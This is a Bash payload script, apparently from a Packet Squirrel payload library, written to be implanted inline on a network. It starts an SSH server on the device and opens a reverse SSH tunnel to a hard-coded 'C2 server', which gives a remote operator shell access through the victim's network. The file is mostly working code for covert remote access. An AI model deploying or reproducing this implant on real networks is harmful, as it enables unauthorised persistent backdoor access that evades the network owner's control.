Files
packetsquirrel-payloads/payloads/library/remote-access/SSH-remote-access/payload.sh

65 lines
1.9 KiB
Bash

#!/bin/bash
# Title: SSH Remote Management Tool for Packet Squirrel
# Description: Makes packet Squirrel directly accessible via SSH on a remote server
# Author: BlackPropaganda
# Version: 0.1
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - SSH connecting
# Blue - SSH connection successful
#
# C2 Server address, port and tunnel port
c2_server="192.168.1.145"
c2_tunnel_port=2222
tunnel_user="username"
# no pass needed, headless mode required so RSA key file is used.
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
# waiting for button press to start SSH connection.
#BUTTON
#
# Magenta indicates SSH connection is launching and the server should have received the connection.
LED SETUP
echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
# we need an IP, so it'll have to be NAT, unless implanted inline.
NETMODE NAT
sleep 8
# debug
#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
# fix file permission problems
# chmod 600 id_rsa
# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
# the tunnel port specified on the server to reach the Squirrel.
#
# default port is 22
echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
service sshd start
sleep 3
ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
# echo $ssh_out >> /root/payloads/switch3/debug.txt
# ssh_pid=$!
echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
LED ATTACK
# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
# SSH will prompt for verification, and to add host to trusted hosts file.
#BUTTON 365d && {
# kill $ssh_pid
#}